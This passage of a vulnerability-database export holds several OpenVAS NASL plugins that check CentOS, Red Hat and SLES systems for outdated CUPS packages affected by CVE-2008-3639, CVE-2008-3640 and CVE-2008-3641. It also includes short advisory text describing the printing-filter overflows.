script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.23~40.46\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.1.23~40.46\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.23~40.46\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.23~40.46\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "Check for the Version of cups", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880304", "type": "openvas", "title": "CentOS Update for cups CESA-2008:0937 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2008:0937 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Common UNIX Printing System (CUPS) provides a portable printing layer\n for UNIX(R) operating systems.\n\n A buffer overflow flaw was discovered in the SGI image format decoding\n routines used by the CUPS image converting filter "imagetops". An attacker\n could create a malicious SGI image file that could, possibly, execute\n arbitrary code as the "lp" user if the file was printed. (CVE-2008-3639)\n \n An integer overflow flaw leading to a heap buffer overflow was discovered\n in the Text-to-PostScript "texttops" filter. An attacker could create a\n malicious text file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3640)\n \n An insufficient buffer bounds checking flaw was discovered in the\n HP-GL/2-to-PostScript "hpgltops" filter. An attacker could create a\n malicious HP-GL/2 file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3641)\n \n Red Hat would like to thank regenrecht for reporting these issues.\n \n All CUPS users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"cups on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015312.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880304\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0937\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_name( \"CentOS Update for cups CESA-2008:0937 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.17~13.3.54\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.17~13.3.54\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.17~13.3.54\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "Check for the Version of cups", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870157", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870157", "type": "openvas", "title": "RedHat Update for cups RHSA-2008:0937-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for cups RHSA-2008:0937-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Common UNIX Printing System (CUPS) provides a portable printing layer\n for UNIX(R) operating systems.\n\n A buffer overflow flaw was discovered in the SGI image format decoding\n routines used by the CUPS image converting filter "imagetops". An attacker\n could create a malicious SGI image file that could, possibly, execute\n arbitrary code as the "lp" user if the file was printed. (CVE-2008-3639)\n \n An integer overflow flaw leading to a heap buffer overflow was discovered\n in the Text-to-PostScript "texttops" filter. An attacker could create a\n malicious text file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3640)\n \n An insufficient buffer bounds checking flaw was discovered in the\n HP-GL/2-to-PostScript "hpgltops" filter. An attacker could create a\n malicious HP-GL/2 file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3641)\n \n Red Hat would like to thank regenrecht for reporting these issues.\n \n All CUPS users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"cups on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00009.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870157\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0937-01\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_name( \"RedHat Update for cups RHSA-2008:0937-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.17~13.3.54\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.1.17~13.3.54\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.17~13.3.54\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.17~13.3.54\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "Check for the Version of cups", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880304", "href": "http://plugins.openvas.org/nasl.php?oid=880304", "type": "openvas", "title": "CentOS Update for cups CESA-2008:0937 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2008:0937 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Common UNIX Printing System (CUPS) provides a portable printing layer\n for UNIX(R) operating systems.\n\n A buffer overflow flaw was discovered in the SGI image format decoding\n routines used by the CUPS image converting filter "imagetops". An attacker\n could create a malicious SGI image file that could, possibly, execute\n arbitrary code as the "lp" user if the file was printed. (CVE-2008-3639)\n \n An integer overflow flaw leading to a heap buffer overflow was discovered\n in the Text-to-PostScript "texttops" filter. An attacker could create a\n malicious text file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3640)\n \n An insufficient buffer bounds checking flaw was discovered in the\n HP-GL/2-to-PostScript "hpgltops" filter. An attacker could create a\n malicious HP-GL/2 file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3641)\n \n Red Hat would like to thank regenrecht for reporting these issues.\n \n All CUPS users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"cups on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015312.html\");\n script_id(880304);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0937\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_name( \"CentOS Update for cups CESA-2008:0937 centos3 i386\");\n\n script_summary(\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.17~13.3.54\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.17~13.3.54\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.17~13.3.54\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "Check for the Version of cups", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880188", "href": "http://plugins.openvas.org/nasl.php?oid=880188", "type": "openvas", "title": "CentOS Update for cups CESA-2008:0937 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2008:0937 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Common UNIX Printing System (CUPS) provides a portable printing layer\n for UNIX(R) operating systems.\n\n A buffer overflow flaw was discovered in the SGI image format decoding\n routines used by the CUPS image converting filter "imagetops". An attacker\n could create a malicious SGI image file that could, possibly, execute\n arbitrary code as the "lp" user if the file was printed. (CVE-2008-3639)\n \n An integer overflow flaw leading to a heap buffer overflow was discovered\n in the Text-to-PostScript "texttops" filter. An attacker could create a\n malicious text file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3640)\n \n An insufficient buffer bounds checking flaw was discovered in the\n HP-GL/2-to-PostScript "hpgltops" filter. An attacker could create a\n malicious HP-GL/2 file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3641)\n \n Red Hat would like to thank regenrecht for reporting these issues.\n \n All CUPS users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"cups on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015331.html\");\n script_id(880188);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0937\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_name( \"CentOS Update for cups CESA-2008:0937 centos4 i386\");\n\n script_summary(\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "Check for the Version of cups", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870157", "href": "http://plugins.openvas.org/nasl.php?oid=870157", "type": "openvas", "title": "RedHat Update for cups RHSA-2008:0937-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for cups RHSA-2008:0937-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Common UNIX Printing System (CUPS) provides a portable printing layer\n for UNIX(R) operating systems.\n\n A buffer overflow flaw was discovered in the SGI image format decoding\n routines used by the CUPS image converting filter "imagetops". An attacker\n could create a malicious SGI image file that could, possibly, execute\n arbitrary code as the "lp" user if the file was printed. (CVE-2008-3639)\n \n An integer overflow flaw leading to a heap buffer overflow was discovered\n in the Text-to-PostScript "texttops" filter. An attacker could create a\n malicious text file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3640)\n \n An insufficient buffer bounds checking flaw was discovered in the\n HP-GL/2-to-PostScript "hpgltops" filter. An attacker could create a\n malicious HP-GL/2 file that could, possibly, execute arbitrary code as the\n "lp" user if the file was printed. (CVE-2008-3641)\n \n Red Hat would like to thank regenrecht for reporting these issues.\n \n All CUPS users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"cups on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00009.html\");\n script_id(870157);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0937-01\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_name( \"RedHat Update for cups RHSA-2008:0937-01\");\n\n script_summary(\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.2.4~11.18.el5_2.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.22~0.rc1.9.27.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.1.17~13.3.54\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-debuginfo\", rpm:\"cups-debuginfo~1.1.17~13.3.54\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.1.17~13.3.54\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.1.17~13.3.54\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "Check for the Version of cups", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", 